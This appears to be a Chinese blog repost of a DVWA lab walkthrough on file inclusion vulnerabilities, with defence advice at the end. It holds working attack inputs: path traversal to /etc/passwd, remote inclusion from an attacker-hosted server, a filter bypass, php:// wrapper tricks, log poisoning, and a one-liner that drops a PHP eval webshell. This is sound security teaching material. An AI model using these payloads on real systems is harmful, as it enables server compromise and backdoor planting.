DVWA亲测文件包含漏洞

最新推荐文章于 2024-05-27 08:00:00 发布
最新推荐文章于 2024-05-27 08:00:00 发布
阅读量634 收藏
点赞数
分类专栏: CTF 经验心得
经验心得 同时被 2 个专栏收录
151 篇文章 20 订阅
订阅专栏
CTF
49 篇文章 17 订阅
订阅专栏

Low级别:

我们分别点击这几个file.php文件

 仅仅是配置参数的变化:

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file3.php

如果我们随便写一个不存在的php文件,比如 :

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=text.php

 

还爆出了路径错误

 

我们先来分析原始内容:

再来分析我们构造好的网址:

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../php.ini

果然可以访问到正常的内容

 

我们再来尝试:

这表明了文件包含不仅仅能读文件,还能执行文件

 

当然,我们不能满足于此,我们甚至可以尝试从本地包含文件

 

我们在本地www目录下新建1.php   ————>  写入<?php phpinfo();?>

 

我们输入网址:

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1/1.php
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1/1.txt

 

果然,外部包含文件成功,这样的话我们可以在1.php代码中写入恶意代码,拿到服务器的webshell

Medium级:

<?php
 
// The page we wish to display
file=_GET[ 'page' ];
 
// Input validation
file=strreplace(array("http://","https://"),"",file );
file=strreplace(array("../","..\""),"",file );
 
?>

就是将输入的url参数中包含的“http://”、“https://”,   ". . /"   ,   ". . \""等字符串替换成空的字符串,

即过滤了远程文件包含, 对于本地文件包含并没有任何过滤:

 

本地包含:

远程包含:

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=httphttp://://127.0.0.1/1.txt

High级:

<?php
 
// The page we wish to display
file=_GET[ 'page' ];
 
// Input validation
if( !fnmatch( "file*", file ) &&file != "include.php" ) 
{
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
 
?>

我们输入:

Impossible级

<?php
 
// The page we wish to display
file=_GET[ 'page' ];
 
// Only allow include.php or file{1..3}.php
if( file != "include.php" &&file != "file1.php" && file != "file2.php" &&file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
 
?>

源码只允许四个文件名,有效的放置了文件的包含漏洞

 

利用

1.读取敏感文件

如直接../../../../../etc/passwd来读取本地文件内容,其他敏感文件的读取是类似的,前提是知道路径。

2.包含Apache文件

可以用nc向目标服务器发送一条内容为一句话木马的错误的指令,让其保存在目标服务器的access.log日志文件中,再通过本地文件包含的方式实现利用。但是测试时没有成功,因为MySQL用户权限不足,不能读取Apache的日志,这时需要提权操作。

这里简便地演示一下,就直接修改文件夹属主,先到/var/log目录下,然后输入命令:chown www-data:www-data apache2 -R

接着以向日志文件写入phpinfo为示例,注意一点是,不能直接在URL栏填写,因为一些字符会被URL编码而不能达到目的,要使用Burpsuite截断代理修改数据包来进行:

然后到Metasploitable2的Apache2的access.log文件中查看:

确实是存在于日志文件中了。

最后直接包含该access.log文件即可:

3.远程包含SHELL

以Medium级为背景,在一台攻击者的服务器如Kali的/var/www/html/目录中放入一句话木马文件,在Kali中通过以下命令启动Apache:

[plain] view plain copy

  1. service apache2 start  

然后在访问DVWA中利用远程文件包含漏洞访问Kali中的木马文件,从而实现利用。

这里注意的是,这个木马文件的内容不能为形如<?php echo shell_exec($_GET['cmd']);?>这种,因为这样只会在该木马文件存放的服务器服务器上执行而不是在目标服务器上执行,如下示例,a.php文件内容如上,但是返回的内容确实Windows服务器的而不是目标主机Metasploitable2的:

因而正确的姿势应该是,该木马文件实现将木马内容写入目标服务器中的1.txt文件,如:

<?php fputs(fopen("shell.php","w"), "<?php eval($_POST[aaa]);?>");?>

访问:

没有啥情况,接着到DVWA服务器查看吧:

存在后门PHP文件,没有问题。

这里示例以phpinfo测试:

4.配合文件上传漏洞

和文件上传漏洞或者SQL注入漏洞等一同利用,通过利用前面的漏洞将一句话木马1.php文件上传到Web服务器中,然后再通过文件包含漏洞包含出现从而得到shell。

例如上传了一个名为1.txt的文件,内容为:<?php phpinfo();?>

直接包含该文件会将该文件以PHP来运行:

5.使用PHP文件封装协议来读取和写入PHP文件

 

   1.读取文件

先看看读取文件,如输入page参数值为:php://filter/read=convert.base64-encode/resource=../../../../../var/www/dvwa/hackable/uploads/1.txt

访问,可以看到显示了base64编码的内容:

使用Burpsuite的Decode模块解码:

可以发现就是之前上传的示例文件内容。

2.写入文件

前提条件是allow_url_include为on,则构造如下URL:192.168.220.128/dvwa/vulnerabilities/fi/?page=php://input

然后再POST需要输入的内容即可,这里通过Firefox的HackBar来POST数据:

可以看到输入的内容执行并返回了结果

6.检测方法

找到有包含函数的页面,对函数内容进行替换查看结果;

可以使用工具来代替手工的过程,如Kadimus、Burpsuite的插件LFI scanner checks等;

白盒测试时,可以在源代码中查看allow_url_fopen、allow_url_include等敏感函数是否开启

7.防御方法

1、严格判断包含中的参数是否外部可控。

2、路径限制,限制被包含的文件只能在某一个文件夹内,特别是一定要禁止目录跳转字符,如:“../”。

3、基于白名单的包含文件验证,验证被包含的文件是否在白名单中。

4、尽量不要使用动态包含,可以在需要包含的页面固定写好,如:“include("head.php")”。

5、可以通过调用str_replace()函数实现相关敏感字符的过滤,一定程度上防御了远程文

 

 

作  者:bmjoker
出  处:https://www.cnblogs.com/bmjoker/p/9035358.html

大方子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1178
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
2. DVWA亲测文件包含漏洞
weixin_30740295的博客
05-14 286
Low级: 我们分别点击这几个file.php文件 仅仅是配置参数的变化: http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file3....
文件包含漏洞:pikachu与DVWA靶场中的文件包含漏洞通关
最新发布
qq_68163788的博客
05-27 1152
文件包含漏洞是一种常见的Web安全漏洞,攻击者可以通过包含恶意文件来执行任意代码或获取敏感信息。在DVWA靶场中,通过利用文件包含漏洞,可以获取系统文件、敏感信息或者执行恶意代码。pikachu可以通过构造恶意文件路径,利用DVWA中的文件包含漏洞来获取管理员权限或者对系统进行攻击。为了防范文件包含漏洞,开发者应该避免直接包含用户输入的文件,并且对输入进行严格的过滤和验证。通过了解和掌握文件包含漏洞的原理和利用方法,可以帮助提高Web应用程序的安全性。
DVWA系列之14 文件包含漏洞分析
weixin_34357928的博客
12-15 175
程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。PHP中提供了四个文件包含的函数,分别是include()、include_once()、requi...
DVWA系列之16 文件包含漏洞挖掘与防御
weixin_33921089的博客
12-23 252
下面我们来分析一下DVWA文件包含漏洞的源码。首先文件包含的主页面是D:\AppServ\www\dvwa\vulnerabilities\fi\index.php文件,文件中的主要代码部分:在这段代码中,首先使用switch语句根据用户选择的安全级别,分别将low.php、medium.php、high.php赋值给变量$vulnerabilityFile,接下来使用require_once函...
dvwa文件包含漏洞
lusandong的博客
04-03 854
dvwa,文件包含
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA漏洞测试平台分析.v1.0.zip
03-12
这个平台包含了各种常见的Web应用漏洞,如SQL注入、XSS跨站脚本、文件包含、命令注入等,让使用者能够在可控环境中学习和实践网络安全攻防技术。 在《DVWA漏洞测试平台分析.v1.0》中,我们将深入探讨这些漏洞的原理...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
十三、kali windows DVWA搭建及测试
01-15
DVWA是OWASP的目,提供了一个安全脆弱的环境,涵盖了多种漏洞类型,包括SQL注入、命令执行、文件上传等。通过学习和测试这些漏洞,安全专家和开发者能更好地理解如何防止和修复它们。搭建DVWA所需的环境是WAMP...
渗透测试初学者资源 DVWA压缩包
12-23
4. **文件包含漏洞**:文件包含漏洞允许攻击者将恶意代码注入到服务器,从而执行任意代码。DVWA会展示如何利用这个漏洞,以及如何避免这种风险。 5. **弱认证与会话管理**:DVWA还包含了关于弱密码策略和不安全的...
DVWA文件包含漏洞
weixin_56306210的博客
05-11 1681
DVWA文件包含漏洞
dvwa的低中高等级进行xss漏洞测试
m0_65150886的博客
08-30 233
alert('this is low xss(reflected)')
DVWA靶场-文件包含漏洞~保姆级教程!!!
2301_77360738的博客
05-11 1415
带你手把手感受dvwa靶场File Inclusion文件包含漏洞,超详细,小白可入!!!
DVWA—【文件包含漏洞】实验详解
weixin_52620919的博客
08-26 1553
LOW 实验关键代码 <?php $file = $_GET ['page'];//The page we wish to display ?> 这是一个典型的在动态网页中的用法,就像注我上一篇文章【文件包含漏洞原理】所讲,写入我们想要显示的页面。这里就是对用户的输入完全信任,因此就导致可以包含任意页面。 程序员在写程序的时候要站在不安全的角度上,而不是用户的角度上,这是从网站安全的角度来说。 实验: 接下来通过文件包含漏洞,查看位于根目录下的1.txt文件的内容,同过这两个实验对比总结远
DVWA——文件包含漏洞详细全解(具体操作步骤和多种方式进行漏洞利用)
热门推荐
weixin_46709219的博客
11-07 1万+
文件包含详细:https://www.cnblogs.com/hai-long/p/10326361.html 文件包含基础:https://blog.csdn.net/weixin_34357928/article/details/85077218 谢公子文件包含:https://blog.csdn.net/qq_36119192/article/details/82915884 中国菜刀Apache:https://blog.csdn.net/sunshine1_0/article/details/86
DVWA 实验报告:4、文件包含 File Inclusion
看那白熊
05-15 741
DVWA 文件包含漏洞复现
dvwa———— 命令执行漏洞
GZY0601的博客
09-20 670
今天我们来讲一下,命令执行漏洞。命令执行漏洞简介命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限说实话这个漏洞也算比较简单的,只要熟悉了windows和linux的基础命令,这里基本都玩的明白,这个漏洞也算是高危的,如果实战遇到直接起飞。好啦,以上内容为我个人理解,不喜勿喷,如有写错欢迎指出!
dvwa命令执行漏洞分析
m0_56578216的博客
09-15 619
这段代码中加入了CSRF token,如果user的token值与更改密码时的token值不相等或者不存在seesion_token值,便会报错,这样就防止了伪造攻击。Anti-CSRF token:同时对参数ip进行严格的限制,只有“数字.数字.数字.数字”的输入才会被接受,因此不存在命令注入漏洞。防范措施:获取要测试的IP,利用函数根据.将其分割成4个数值,再重新拼接后进行测试。限制了只有数字.数字.数字.数字才会接受,所以杜绝了命令注入漏洞。explode()函数:将所有的字符串打散成为数组。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值